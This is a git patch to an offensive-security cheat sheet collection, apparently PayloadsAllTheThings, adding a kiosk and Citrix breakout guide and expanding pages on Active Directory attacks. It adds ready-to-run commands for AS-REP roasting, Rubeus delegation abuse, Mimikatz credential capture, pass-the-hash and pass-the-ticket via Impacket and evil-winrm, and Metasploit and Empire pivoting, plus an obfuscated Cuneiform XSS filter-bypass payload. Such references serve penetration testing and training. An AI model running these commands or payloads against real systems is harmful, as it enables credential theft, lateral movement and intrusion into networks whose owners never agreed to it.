From f7e8f515a5697e7c8ed64e703781a023f1cd410e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 17 Dec 2020 08:56:58 +0100 Subject: [PATCH] Application Escape and Breakout --- .../Active Directory Attack.md | 8 +- Methodology and Resources/Escape Breakout.md | 111 ++++++++++++++++++ .../Network Pivoting Techniques.md | 16 ++- .../Windows - Mimikatz.md | 6 +- .../Windows - Using credentials.md | 30 ++++- XSS Injection/README.md | 10 ++ 6 files changed, 171 insertions(+), 10 deletions(-) create mode 100644 Methodology and Resources/Escape Breakout.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index e9afbd3..0e4857a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1126,7 +1126,7 @@ Mitigations: If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting Prerequisite: -- Accounts have to have **DONT_REQ_PREAUTH** +- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast @@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r # crack AS_REP messages root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt +root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt ``` Mitigations: @@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012. 5. Use Rubeus to get hash from password ```powershell - Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan + Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan [*] Input password : Weakest123* - [*] Input username : swktest + [*] Input username : swktest$ [*] Input domain : factory.lan [*] Salt : FACTORY.LANswktest [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD @@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012. ```powershell .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md new file mode 100644 index 0000000..016f612 --- /dev/null +++ b/Methodology and Resources/Escape Breakout.md @@ -0,0 +1,111 @@ +# Application Escape and Breakout + +## Summary + +* [Gaining a command shell](#gaining-a-command-shell) +* [Sticky Keys](#explorer---sticky-keys) +* [Dialog Boxes](#dialog-boxes) + * [Creating new files](#creating-new-files) + * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) + * [Exploring Context Menus](#exploring-context-menus) + * [Save as](#save-as) + * [Input Boxes](#input-boxes) + * [Bypass file restrictions](#bypass-file-restrictions) +* [Internet Explorer](#internet-explorer) +* [Shell URI Handlers](#shell-uri-handlers) +* [References](#references) + +## Gaining a command shell + +* **Shortcut** + * [Window] + [R] -> cmd + * [CTRL] + [ALT] + [SHIFT] -> Task Manager +* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it +* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe +* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` +* **Task Manager**: `File` > `New Task (Run...)` +* **MSPAINT.exe** + * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels + * Zoom in to make the following tasks easier + * Using the colour picker, set pixels values to (from left to right): + * 1st: R: 10, G: 0, B: 0 + * 2nd: R: 13, G: 10, B: 13 + * 3rd: R: 100, G: 109, B: 99 + * 4th: R: 120, G: 101, B: 46 + * 5th: R: 0, G: 0, B: 101 + * 6th: R: 0, G: 0, B: 0 + * Save it as 24-bit Bitmap (*.bmp;*.dib) + * Change its extension from bmp to bat and run + + +## Sticky Keys + +* Spawn the sticky keys dialog + * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` + * Hit 5 times [SHIFT] +* Visit "Ease of Access Center" +* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center" +* Start the OSK (On-Screen-Keyboard) +* You can now use the keyboard shortcut (CTRL+N) + +## Dialog Boxes + +### Creating new files + +* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open +* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32` + +## Open a new Windows Explorer instance + +* Right click any folder > select `Open in new window` + +## Exploring Context Menus + +* Right click any file/folder and explore context menus +* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location` + +### Save as + +* "Save as" / "Open as" option +* "Print" feature – selecting "print to file" option (XPS/PDF/etc) +* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe` + +### Input Boxes + +Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\` + + +### Bypass file restrictions + +Enter *.* or *.exe or similar in `File name` box + +## Internet Explorer + +### Download and Run/Open + +* Text files -> opened by Notepad + +### Menus + +* The address bar +* Search menus +* Help menus +* Print menus +* All other menus that provide dialog boxes + +## Shell URI Handlers + +* shell:DocumentsLibrary +* shell:Librariesshell:UserProfiles +* shell:Personal +* shell:SearchHomeFolder +* shell:System shell:NetworkPlacesFolder +* shell:SendTo +* shell:Common Administrative Tools +* shell:MyComputerFolder +* shell:InternetFolder + +## References + +* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) +* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index eea9f00..09285a3 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -138,7 +138,12 @@ or # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 run autoroute -s 192.168.15.0/24 -use auxiliary/server/socks4a +use auxiliary/server/socks_proxy +set SRVPORT 9090 +set VERSION 4a +# or +use auxiliary/server/socks4a # (deprecated) + # Meterpreter list all active routes run autoroute -p @@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3 route flush ``` +## Empire + +```powershell +(Empire) > socksproxyserver +(Empire) > use module management/invoke_socksproxy +(Empire) > set remoteHost 10.10.10.10 +(Empire) > run +``` + ## sshuttle Transparent proxy server that works as a poor man's VPN. Forwards over ssh. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 5f10e0b..e76595c 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo mimikatz # sekurlsa::logonpasswords ``` -- LSA is running as virtualized process (LSAISO) by Credential Guard +- LSA is running as virtualized process (LSAISO) by **Credential Guard** ```powershell # Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso - # If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. - #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides + # Lets inject our own malicious Security Support Provider into memory + # require mimilib.dll in the same folder mimikatz # misc::memssp # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5808c16..9e84dda 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -7,8 +7,8 @@ * [TIP 2 - Retail Credential](#tip-2-retail-credential) * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) * [Metasploit](#metasploit) - * [Metasploit - SMB](#metasploit-smb) - * [Metasploit - Psexec](#metasploit-psexec) + * [Metasploit - SMB](#metasploit---smb) + * [Metasploit - Psexec](#metasploit---psexec) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [WinRM](#winrm) * [Powershell Remoting](#powershell-remoting) @@ -20,6 +20,8 @@ * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Netuse](#netuse) * [Runas](#runas) +* [Pass the Ticket](#pass-the-ticket) +* [SSH](#ssh) ## TIPS @@ -87,6 +89,7 @@ use exploit/windows/smb/psexec set RHOST 10.2.0.3 set SMBUser username set SMBPass password +set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -123,6 +126,7 @@ Require: root@payload$ git clone https://github.com/Hackplayers/evil-winrm root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 ``` or using a custom ruby code to interact with the WinRM service. @@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## Psexec.py / Smbexec.py / Wmiexec.py -from Impacket +From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali) ```powershell root@payload$ git clone https://github.com/CoreSecurity/impacket.git @@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10 # A semi-interactive shell, used through Windows Management Instrumentation. root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 +root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79 + # A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 @@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` +## Pass the Ticket + +```powershell +python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user +[*] Saving ticket in user.ccache +cp user.ccache /tmp/krb5cc_0 +export KRB5CCNAME=/tmp/krb5cc_0 +klist +``` + +## SSH + +:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash! + +```ps1 +cp user.ccache /tmp/krb5cc_1045 +ssh -o GSSAPIAuthentication=yes user@domain.local -vv +``` ## References diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 022ad40..51b9e31 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) + - [Bypass using Cuneiform](#bypass-using-cuneiform) - [Bypass using Lontara](#bypass-using-lontara) - [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using Octal encoding](#bypass-using-octal-encoding) @@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library. javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() ``` +### Bypass using Cuneiform + +```javascript +𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], +𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] ++(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] ++𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() +``` + ### Bypass using Lontara ```javascript